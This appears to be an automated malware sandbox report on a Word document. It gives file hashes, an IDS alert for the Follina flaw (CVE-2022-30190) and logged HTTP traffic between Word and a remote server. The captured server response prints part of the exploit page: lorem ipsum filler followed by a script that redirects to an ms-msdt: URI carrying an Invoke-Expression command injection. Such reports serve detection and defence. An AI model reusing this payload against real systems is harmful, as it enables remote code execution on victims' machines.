                                                                                                                                                                            Preview:<?xml version="1.0"?>..<?Copyright (c) Microsoft Corporation. All rights reserved.?>..<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">...<xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>...<xsl:template name="localization">....<_locDefinition>.....<_locDefault _loc="locNone"/>.....<_locTag _loc="locData">String</_locTag>.....<_locTag _loc="locData">Font</_locTag>.....<_locTag _loc="locData">Mirror</_locTag>....</_locDefinition>...</xsl:template>... ********** Images ********** -->...<xsl:variable name="images">....<Image id="check">res://sdiageng.dll/check.png</Image>....<Image id="error">res://sdiageng.dll/error.png</Image>....<Image id="info">res://sdiageng.dll/info.png</Image>....<Image id="warning">res://sdiageng.dll/warning.png</Image>....<Image id="expand">res://sdiageng.dll/expand.png</Image>....<Image id="

                                                                                                                                                                            Static File Info

                                                                                                                                                                            General

                                                                                                                                                                            File type:Microsoft OOXML
                                                                                                                                                                            Entropy (8bit):7.869586027326007
                                                                                                                                                                            TrID:
                                                                                                                                                                            • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                                                            • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                                                            • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                                                            File name:doc1712.docx
                                                                                                                                                                            File size:10142
                                                                                                                                                                            MD5:7a91b01a037ccbfe6589161643d0a65a
                                                                                                                                                                            SHA1:53658a5b5bc577d601e23ae77a34cb44dcba1f27
                                                                                                                                                                            SHA256:f17f5c8eac3a18c961705a61385e1d2894cc8f22fb33aa3e076a40b826384c60
                                                                                                                                                                            SHA512:f1accdbe0ea88f717f7473818df6ee72fc77077c1a145bb872863bb0bb681cb59b653dd6927e68fd2b9e8942b7498c5e7e8ab26c8d0aece3c9fcc21e580ad100
                                                                                                                                                                            SSDEEP:192:s5VReDWRPj8Iugw1Blb8VPkf+CFk4v1Y2VveFLC9FJ7S/bQ7dlJ78:snPj8I10lD9+2Vvxm/bqlJ78
                                                                                                                                                                            TLSH:29229E36D65508B1CAD7A279E0AC1A19E30C41BBA37BE9CB61C663E412C86DF0F5530C
                                                                                                                                                                            File Content Preview:PK.........k.T...L....'.......[Content_Types].xml...n.0.E....m.NR....,.X...~...`.l.....C ......l....sg..'.m..kp^...Q4d...H..1.X...,.(.......x6..L.;.>.b.c.!...}.A!|d,h.....i.....K,....;....1.R.M'O..U....^WF.....Ub....6W.@.....(aM..r..3e....?J(#....7..S...p

                                                                                                                                                                            File Icon

                                                                                                                                                                            Icon Hash:74fcd0d2d6d6d0cc

                                                                                                                                                                            Network Behavior

                                                                                                                                                                            Snort IDS Alerts

                                                                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                            45.32.185.177192.168.2.2280491762036726 06/07/22-17:33:41.296228TCP2036726ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190)804917645.32.185.177192.168.2.22

                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                            TCP Packets

                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                            Jun 7, 2022 17:40:01.261898994 CEST4975480192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:01.284775019 CEST804975445.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:01.284935951 CEST4975480192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:01.330207109 CEST4975480192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:01.353049040 CEST804975445.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:01.353324890 CEST804975445.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:01.416440964 CEST4975480192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:01.618510962 CEST4975480192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:01.649507046 CEST804975445.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:01.649537086 CEST804975445.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:01.726898909 CEST4975480192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:04.830586910 CEST4975480192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:04.853626013 CEST804975445.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:04.853727102 CEST804975445.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:04.914709091 CEST4975480192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:04.965629101 CEST4976580192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:04.988662004 CEST804976545.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:04.988858938 CEST4976580192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:04.989356041 CEST4976580192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:05.012072086 CEST804976545.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:05.012257099 CEST804976545.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:05.012276888 CEST804976545.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:05.012293100 CEST804976545.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:05.012310028 CEST804976545.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:05.012326956 CEST804976545.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:05.012418032 CEST4976580192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:05.013582945 CEST4976580192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:05.202013969 CEST4976580192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:05.224978924 CEST804976545.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:05.225053072 CEST804976545.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:05.225275993 CEST4976580192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:05.404911041 CEST4976580192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:05.427814960 CEST804976545.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:05.427958012 CEST804976545.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:05.428090096 CEST4976580192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:05.484183073 CEST4975480192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:05.507198095 CEST804975445.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:05.507391930 CEST804975445.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:05.535316944 CEST4975480192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:05.558767080 CEST804975445.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:05.569519997 CEST4976580192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:05.592355013 CEST804976545.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:05.592567921 CEST804976545.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:05.592713118 CEST4976580192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:05.607100964 CEST4976580192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:05.630181074 CEST804976545.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:05.630321980 CEST4976580192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:05.727263927 CEST4975480192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:05.822417021 CEST4976580192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:05.845601082 CEST804976545.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:05.845777988 CEST4976580192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:09.210685015 CEST4976580192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:09.233540058 CEST804976545.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:09.233652115 CEST4976580192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:10.558923960 CEST804975445.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:10.559022903 CEST4975480192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:10.564964056 CEST4975480192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:10.587596893 CEST804975445.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:14.234853029 CEST804976545.32.185.177192.168.2.5
                                                                                                                                                                            Jun 7, 2022 17:40:14.234966993 CEST4976580192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:41:45.709701061 CEST4976580192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:41:46.021997929 CEST4976580192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:41:46.725224018 CEST4976580192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:41:47.928437948 CEST4976580192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:41:50.335591078 CEST4976580192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:41:55.137425900 CEST4976580192.168.2.545.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:42:04.742346048 CEST4976580192.168.2.545.32.185.177

                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                            • 45.32.185.177

                                                                                                                                                                            HTTP Packets

                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            0192.168.2.54975445.32.185.17780C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Jun 7, 2022 17:40:01.330207109 CEST722OUTOPTIONS / HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                                            X-MSGETWEBURL: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            Host: 45.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:01.353324890 CEST722INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Tue, 07 Jun 2022 15:40:01 GMT
                                                                                                                                                                            Server: Apache/2.4.48 (Ubuntu)
                                                                                                                                                                            Allow: GET,POST,OPTIONS,HEAD
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Jun 7, 2022 17:40:01.618510962 CEST723OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            Host: 45.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:01.649537086 CEST723INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Tue, 07 Jun 2022 15:40:01 GMT
                                                                                                                                                                            Server: Apache/2.4.48 (Ubuntu)
                                                                                                                                                                            Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT
                                                                                                                                                                            ETag: "1701-5e0db72a43821"
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Content-Length: 5889
                                                                                                                                                                            Keep-Alive: timeout=5, max=99
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 7, 2022 17:40:04.830586910 CEST1280OUTOPTIONS / HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                                            X-MSGETWEBURL: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            Host: 45.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:04.853727102 CEST1280INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Tue, 07 Jun 2022 15:40:04 GMT
                                                                                                                                                                            Server: Apache/2.4.48 (Ubuntu)
                                                                                                                                                                            Allow: GET,POST,OPTIONS,HEAD
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            Keep-Alive: timeout=5, max=98
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Jun 7, 2022 17:40:05.484183073 CEST1289OUTOPTIONS / HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                                            X-MSGETWEBURL: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            Host: 45.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:05.507391930 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Tue, 07 Jun 2022 15:40:05 GMT
                                                                                                                                                                            Server: Apache/2.4.48 (Ubuntu)
                                                                                                                                                                            Allow: GET,POST,OPTIONS,HEAD
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            Keep-Alive: timeout=5, max=97
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Jun 7, 2022 17:40:05.535316944 CEST1290OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            Host: 45.32.185.177
                                                                                                                                                                            Jun 7, 2022 17:40:05.558767080 CEST1290INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Tue, 07 Jun 2022 15:40:05 GMT
                                                                                                                                                                            Server: Apache/2.4.48 (Ubuntu)
                                                                                                                                                                            Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT
                                                                                                                                                                            ETag: "1701-5e0db72a43821"
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Content-Length: 5889
                                                                                                                                                                            Keep-Alive: timeout=5, max=96
                                                                                                                                                                            Connection: Keep-Alive


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            1192.168.2.54976545.32.185.17780C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Jun 7, 2022 17:40:04.989356041 CEST1281OUTGET /123.RES HTTP/1.1
                                                                                                                                                                            Accept: */*
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            Host: 45.32.185.177
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 7, 2022 17:40:05.012257099 CEST1282INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Tue, 07 Jun 2022 15:40:04 GMT
                                                                                                                                                                            Server: Apache/2.4.48 (Ubuntu)
                                                                                                                                                                            Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT
                                                                                                                                                                            ETag: "1701-5e0db72a43821"
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Content-Length: 5889
                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 0d 0a 47 6f 6f 64 20 74 68 69 6e 67 20 77 65 20 64 69 73 61 62 6c 65 64 20 6d 61 63 72 6f 73 0d 0a 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 70 3e 0d 0a 4c 6f 72 65 6d 20 69 70 73 75 6d 20 64 6f 6c 6f 72 20 73 69 74 20 61 6d 65 74 2c 20 63 6f 6e 73 65 63 74 65 74 75 72 20 61 64 69 70 69 73 63 69 6e 67 20 65 6c 69 74 2e 20 51 75 69 73 71 75 65 20 70 65 6c 6c 65 6e 74 65 73 71 75 65 20 65 67 65 73 74 61 73 20 6e 75 6c 6c 61 20 69 6e 20 64 69 67 6e 69 73 73 69 6d 2e 20 4e 61 6d 20 69 64 20 6d 61 75 72 69 73 20 6c 6f 72 65 6d 2e 20 4e 75 6e 63 20 73 75 73 63 69 70 69 74 20 69 64 20 6d 61 67 6e 61 20 69 64 20 6d 6f 6c 6c 69 73 2e 20 50 65 6c 6c 65 6e 74 65 73 71 75 65 20 73 75 73 63 69 70 69 74 20 6f 72 63 69 20 6e 65 71 75 65 2c 20 61 74 20 6f 72 6e 61 72 65 20 73 61 70 69 65 6e 20 62 69 62 65 6e 64 75 6d 20 65 75 2e 20 56 65 73 74 69 62 75 6c 75 6d 20 6d 61 6c 65 73 75 61 64 61 20 6e 65 63 20 73 65 6d 20 71 75 69 73 20 66 69 6e 69 62 75 73 2e 20 4e 61 6d 20 71 75 69 73 20 6c 69 67 75 6c 61 20 65 74 20 64 75 69 20 66 61 75 63 69 62 75 73 20 66 61 75 63 69 62 75 73 2e 20 49 6e 20 71 75 69 73 20 62 69 62 65 6e 64 75 6d 20 74 6f 72 74 6f 72 2e 0d 0a 0d 0a 43 75 72 61 62 69 74 75 72 20 72 75 74 72 75 6d 20 6c 65 6f 20 74 6f 72 74 6f 72 2c 20 76 65 6e 65 6e 61 74 69 73 20 66 65 72 6d 65 6e 74 75 6d 20 65 78 20 70 6f 72 74 74 69 74 6f 72 20 76 69 74 61 65 2e 20 50 72 6f 69 6e 20 65 75 20 69 6d 70 65 72 64 69 65 74 20 6c 6f 72 65 6d 2c 20 61 63 20 61 6c 69 71 75 65 74 20 72 69 73 75 73 2e 20 41 65 6e 65 61 6e 20 65 75 20 73 61 70 69 65 6e 20 70 68 61 72 65 74 72 61 2c 20 69 6d 70 65 72 64 69 65 74 20 69 70 73 75 6d 20 75 74 2c 20 73 65 6d 70 65 72 20 64 69 61 6d 2e 20 4e 75 6c 6c 61 20 66 61 63 69 6c 69 73 69 2e 20 53 65 64 20 65 75 69 73 6d 6f 64 20 74 6f 72 74 6f 72 20 74 6f 72 74 6f 72 2c 20 6e 6f 6e 20 65 6c 65 69 66 65 6e 64 20 6e 75 6e 63 20 66 65 72 6d 65 6e 74 75 6d 20 73 69 74 20 61 6d 65 74 2e 20 49 6e 74 65 67 65 72 20 6c 69 67 75 6c 61 20 6c 69 67 75 6c 61 2c 20 63 6f 6e 67 75 65 20 61 74 20 73 63 65 6c 65 72 69 73 71 75 65 20 73 69 74 20 61 6d 65 74 2c 20 70 6f 72 74 74 69 74 6f 72 20 71 75 69 73 20 66 65 6c 69 73 2e 20 4d 61 65 63 65 6e 61 73 20 6e 65 63 20 6a 75 73 74 6f 20 76 61 72 69 75 73 2c 20 73 65 6d 70 65 72 20 74 75 72 70 69 73 20 75 74 2c 20 67 72 61 76 69 64 61 20 6c 6f 72 65 6d 2e 20 50 72 6f 69 6e 20 61 72 63 75 20 6c 69 67 75 6c 61 2c 20 76 65 6e 65 6e 61 74 69 73 20 61 6c 69 71 75 61 6d 20 74 72 69 73 74 69 71 75 65 20 75 74 2c 20 70 72 65 74 69 75 6d 20 71 75 69 73 20 76 65 6c 69 74 2e 0d 0a 0d 0a 50 68 61 73 65 6c 6c 75 73 20 74 72 69 73 74 69 71 75 65 20 6f 72 63 69 20 65 6e 69 6d 2c 20 61 74 20 61 63 63 75 6d 73 61 6e 20 76 65 6c 69 74 20 69 6e 74 65 72 64 75 6d 20 65 74 2e 20 41 65 6e 65 61 6e 20 6e 65 63 20 74 72 69 73 74 69 71 75 65 20 61 6e 74 65 2c 20 64 69 67 6e 69 73 73 69 6d 20 63 6f 6e 76 61 6c 6c 69 73 20 6c 69 67 75 6c 61 2e 20 41 65 6e 65 61 6e 20 71 75 69 73 20 66 65 6c 69 73 20 64 6f 6c 6f 72 2e 20 49 6e 20 71 75 69 73 20 6c 65 63 74 75 73 20 6d
                                                                                                                                                                            Data Ascii: <!doctype html><html lang="en"><head><title>Good thing we disabled macros</title></head><body><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignissim convallis ligula. Aenean quis felis dolor. In quis lectus m
                                                                                                                                                                            Jun 7, 2022 17:40:05.012276888 CEST1283INData Raw: 61 73 73 61 2e 20 50 65 6c 6c 65 6e 74 65 73 71 75 65 20 71 75 69 73 20 70 72 65 74 69 75 6d 20 6d 61 73 73 61 2e 20 56 69 76 61 6d 75 73 20 66 61 63 69 6c 69 73 69 73 20 75 6c 74 72 69 63 69 65 73 20 6d 61 73 73 61 20 61 63 20 63 6f 6d 6d 6f 64
                                                                                                                                                                            Data Ascii: assa. Pellentesque quis pretium massa. Vivamus facilisis ultricies massa ac commodo. Nam nec congue magna. Nullam laoreet justo ut vehicula lobortis.Aliquam rutrum orci tortor, non porta odio feugiat eu. Vivamus nulla mauris, eleifend eu e
                                                                                                                                                                            Jun 7, 2022 17:40:05.012293100 CEST1285INData Raw: 20 43 75 72 61 62 69 74 75 72 20 69 6e 74 65 72 64 75 6d 2c 20 6e 69 73 6c 20 65 75 20 6c 61 6f 72 65 65 74 20 74 65 6d 70 75 73 2c 20 61 75 67 75 65 20 6e 69 73 6c 20 76 6f 6c 75 74 70 61 74 20 6f 64 69 6f 2c 20 64 69 63 74 75 6d 20 61 6c 69 71
                                                                                                                                                                            Data Ascii: Curabitur interdum, nisl eu laoreet tempus, augue nisl volutpat odio, dictum aliquam massa orci sit amet magna.Duis pulvinar vitae neque non placerat. Nullam at dui diam. In hac habitasse platea dictumst. Sed quis mattis libero. Nullam si
                                                                                                                                                                            Jun 7, 2022 17:40:05.012310028 CEST1286INData Raw: 20 73 75 73 63 69 70 69 74 20 73 69 74 20 61 6d 65 74 20 6d 61 73 73 61 2e 20 56 69 76 61 6d 75 73 20 69 6e 20 6c 65 63 74 75 73 20 65 72 61 74 2e 20 4e 75 6c 6c 61 20 66 61 63 69 6c 69 73 69 2e 20 56 69 76 61 6d 75 73 20 73 65 64 20 6d 61 73 73
                                                                                                                                                                            Data Ascii: suscipit sit amet massa. Vivamus in lectus erat. Nulla facilisi. Vivamus sed massa quis arcu egestas vehicula. Nulla massa lorem, tincidunt sed feugiat quis, faucibus a risus. Sed viverra turpis sit amet metus iaculis finibus.Morbi conval
                                                                                                                                                                            Jun 7, 2022 17:40:05.012326956 CEST1287INData Raw: 73 2e 20 55 74 20 76 65 68 69 63 75 6c 61 2c 20 6a 75 73 74 6f 20 61 63 20 70 6f 72 74 61 20 66 61 63 69 6c 69 73 69 73 2c 20 6d 69 20 73 61 70 69 65 6e 20 65 66 66 69 63 69 74 75 72 20 69 70 73 75 6d 2c 20 73 69 74 20 66 75 73 63 65 2e 0d 0a 3c
                                                                                                                                                                            Data Ascii: s. Ut vehicula, justo ac porta facilisis, mi sapien efficitur ipsum, sit fusce.</p><script> location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Exp
                                                                                                                                                                            Jun 7, 2022 17:40:05.202013969 CEST1288OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                            Host: 45.32.185.177
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 7, 2022 17:40:05.225053072 CEST1288INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Tue, 07 Jun 2022 15:40:05 GMT
                                                                                                                                                                            Server: Apache/2.4.48 (Ubuntu)
                                                                                                                                                                            Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT
                                                                                                                                                                            ETag: "1701-5e0db72a43821"
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Content-Length: 5889
                                                                                                                                                                            Keep-Alive: timeout=5, max=99
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 7, 2022 17:40:05.404911041 CEST1288OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                            Host: 45.32.185.177
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 7, 2022 17:40:05.427958012 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Tue, 07 Jun 2022 15:40:05 GMT
                                                                                                                                                                            Server: Apache/2.4.48 (Ubuntu)
                                                                                                                                                                            Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT
                                                                                                                                                                            ETag: "1701-5e0db72a43821"
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Content-Length: 5889
                                                                                                                                                                            Keep-Alive: timeout=5, max=98
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 7, 2022 17:40:05.569519997 CEST1290OUTGET /123.RES HTTP/1.1
                                                                                                                                                                            Accept: */*
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            Host: 45.32.185.177
                                                                                                                                                                            If-Modified-Since: Tue, 07 Jun 2022 13:20:09 GMT
                                                                                                                                                                            If-None-Match: "1701-5e0db72a43821"
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 7, 2022 17:40:05.592567921 CEST1291INHTTP/1.1 304 Not Modified
                                                                                                                                                                            Date: Tue, 07 Jun 2022 15:40:05 GMT
                                                                                                                                                                            Server: Apache/2.4.48 (Ubuntu)
                                                                                                                                                                            Last-Modified: Tue, 07 Jun 2022 13:20:09 GMT
                                                                                                                                                                            ETag: "1701-5e0db72a43821"
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Keep-Alive: timeout=5, max=97
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 7, 2022 17:40:05.607100964 CEST1291OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                            Host: 45.32.185.177
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 7, 2022 17:40:05.630181074 CEST1291INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Tue, 07 Jun 2022 15:40:05 GMT
                                                                                                                                                                            Server: Apache/2.4.48 (Ubuntu)
